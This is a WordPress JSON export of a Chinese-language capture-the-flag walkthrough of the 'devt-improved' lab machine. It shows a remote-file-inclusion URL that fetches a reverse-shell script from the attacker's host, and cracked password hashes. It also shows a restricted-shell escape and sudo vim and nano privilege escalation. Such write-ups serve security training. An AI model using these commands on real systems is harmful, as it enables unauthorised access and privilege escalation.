href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024738.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024738.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323193409792\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u786e\u5b9e\u4e0d\u662f\u901a\u8fc7\u626b\u63cf\u5f97\u5230\u4e1c\u897f\u7684\u3002\u3002\u3002\u3002<\/p>\n<p>\u56de\u5934\u627e\u529e\u6cd5\u7684\u65f6\u5019\u624d\u53d1\u73b0\u57288080\u7aef\u53e3\u5c31\u6697\u793a\u4e86\u53ef\u80fd\u542f\u52a8\u4e86<code>HIDS<\/code>\u3002<\/p>\n<blockquote>\n<p>HIDS\u5168\u79f0\u662fHost-based Intrusion Detection System\uff0c\u5373\u57fa\u4e8e\u4e3b\u673a\u578b\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf\u3002\u4f5c\u4e3a\u8ba1\u7b97\u673a\u7cfb\u7edf\u7684\u76d1\u89c6\u5668\u548c\u5206\u6790\u5668\uff0c\u5b83\u5e76\u4e0d\u4f5c\u7528\u4e8e\u5916\u90e8\u63a5\u53e3\uff0c\u800c\u662f\u4e13\u6ce8\u4e8e\u7cfb\u7edf\u5185\u90e8\uff0c\u76d1\u89c6\u7cfb\u7edf\u5168\u90e8\u6216\u90e8\u5206\u7684\u52a8\u6001\u7684\u884c\u4e3a\u4ee5\u53ca\u6574\u4e2a\u8ba1\u7b97\u673a\u7cfb\u7edf\u7684\u72b6\u6001\u3002<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024739.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024739.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323193755317\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e86\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff01<\/p>\n<p>\u5c1d\u8bd5\u5f31\u5bc6\u7801\u4ee5\u53ca\u4e07\u80fd\u5bc6\u7801\uff0c\u53d1\u73b0\u62a5\u9519\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024740.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024740.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323193921472\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u627e\u4e00\u4e0b\u8fd9\u4e2a\u62a5\u9519\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024741.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024741.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323194231466\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024742.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024742.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323194254823\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5b83\u7684payload:<\/p>\n<pre><code class=\"language-bash\">\/[path]\/slogin_lib.inc.php?slogin_path=[remote_txt_shell]\n\/[path]\/slog_users.txt<\/code><\/pre>\n<pre><code class=\"language-text\">http:\/\/192.168.37.131:8080\/developmentsecretpage\/slogin_lib.inc.php?slogin_path=http:\/\/192.168.37.128:8888\/reverseShell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024743.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024743.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323194903982\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7b2c\u4e00\u4e2a\u5931\u8d25\u4e86\uff0c\u7ee7\u7eed\u5c1d\u8bd5\u3002<\/p>\n<pre><code class=\"language-text\">http:\/\/192.168.37.131:8080\/developmentsecretpage\/slog_users.txt<\/code><\/pre>\n<pre><code class=\"language-apl\">admin, 3cb1d13bb83ffff2defe8d1443d3a0eb\nintern, 4a8a2b374f463b7aedbb44a066363b81\npatrick, 87e6d56ce79af90dbe07d387d3d0579e\nqiu, ee64497098d0926d198f54f6d5431f98<\/code><\/pre>\n<p>\u8fdb\u884c md5 \u89e3\u5bc6\uff1a<\/p>\n<pre><code class=\"language-apl\">admin       \nintern      12345678900987654321\npatrick     P@ssw0rd25\nqiu         qiu<\/code><\/pre>\n<p>\u5c1d\u8bd5ssh\u767b\u5f55\u3002<\/p>\n<pre><code class=\"language-bash\">ssh intern@192.168.37.131<\/code><\/pre>\n<p>\u51fa\u73b0\u4e86\u4ee5\u4e0b\u62a5\u9519\uff1a<\/p>\n<pre><code class=\"language-text\">@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\nIT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!\nSomeone could be eavesdropping on you right now (man-in-the-middle attack)!\nIt is also possible that a host key has just been changed.\nThe fingerprint for the ED25519 key sent by the remote host is\nSHA256:gCZ6+ixH4Qe19wr8iDYUTaofDOf16k4ccCQ68NZ08yM.\nPlease contact your system administrator.\nAdd correct host key in \/home\/kali\/.ssh\/known_hosts to get rid of this message.\nOffending ECDSA key in \/home\/kali\/.ssh\/known_hosts:33\n  remove with:\n  ssh-keygen -f &#039;\/home\/kali\/.ssh\/known_hosts&#039; -R &#039;192.168.37.131&#039;\nHost key for 192.168.37.131 has changed and you have requested strict checking.\nHost key verification failed.<\/code><\/pre>\n<p>\u662f\u56e0\u4e3a\u4e4b\u524d\u6709\u4e2a\u9776\u573a\u57df\u540d\u548c\u8fd9\u4e2a\u4e00\u6a21\u4e00\u6837\uff0c\u6240\u4ee5\u5b58\u4e0b\u6765\u4e86\uff0c\u4f7f\u7528\u547d\u4ee4<code>ssh-keygen -f &#039;\/home\/kali\/.ssh\/known_hosts&#039; -R &#039;192.168.37.131&#039;<\/code>\u5220\u6389\u5c31\u884c\u4e86\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024744.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024744.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323201323393\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u6269\u5c55\u4e00\u4e0b<\/h3>\n<p>\u867d\u7136\u8fde\u63a5\u4e0a\u4e86\uff0c\u4f46\u662f\u662f\u4e00\u4e2a\u53d7\u9650\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">intern:~$ ?\ncd  clear  echo  exit  help  ll  lpath  ls<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5207\u6362\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u6269\u5c55\u4e00\u4e0b\u3002<\/p>\n<pre><code class=\"language-bash\">intern:~$ echo os.system(&quot;\/bin\/bash&quot;)\nintern@development:~$ whoami;id\nintern\nuid=1002(intern) gid=1006(intern) groups=1006(intern)\nintern@development:~$ ls\naccess  local.txt  work.txt\nintern@development:~$ cat local.txt\nCongratulations on obtaining a user shell. :)\nintern@development:~$ cat work.txt\n1.      Tell Patrick that shoutbox is not working. We need to revert to the old method to update David about shoutbox. For new, we will use the old director&#039;s landing page.\n\n2.      Patrick&#039;s start of the third year in this company!\n\n3.      Attend the meeting to discuss if password policy should be relooked at.\nintern@development:~$ sudo -l\n[sudo] password for intern: \nSorry, user intern may not run sudo on development.<\/code><\/pre>\n<h3>\u5207\u6362\u7528\u6237<\/h3>\n<pre><code class=\"language-bash\">intern@development:~$ su patrick\nPassword: \npatrick@development:\/home\/intern$ whoami\npatrick\npatrick@development:\/home\/intern$ id\nuid=1001(patrick) gid=1005(patrick) groups=1005(patrick),108(lxd)\npatrick@development:\/home\/intern$ sudo -l\nMatching Defaults entries for patrick on development:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser patrick may run the following commands on development:\n    (ALL) NOPASSWD: \/usr\/bin\/vim\n    (ALL) NOPASSWD: \/bin\/nano<\/code><\/pre>\n<h3>vim\u63d0\u6743<\/h3>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/vim\/\">https:\/\/gtfobins.github.io\/gtfobins\/vim\/<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024745.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024745.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323202013469\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024747.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024747.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323202106017\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>nano\u63d0\u6743<\/h3>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/nano\/\">https:\/\/gtfobins.github.io\/gtfobins\/nano\/<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024748.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024748.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323202157480\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">sudo nano\nctrl+r ctrl+x\nreset; sh 1&gt;&amp;0 2&gt;&amp;0<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024749.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024749.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323202356523\" \/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>devt-improved \u770b\u6765\u6ca1\u9519\u4e86 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.37.13 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-448","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/448","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=448"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/448\/revisions"}],"predecessor-version":[{"id":451,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/448\/revisions\/451"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=448"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=448"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=448"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}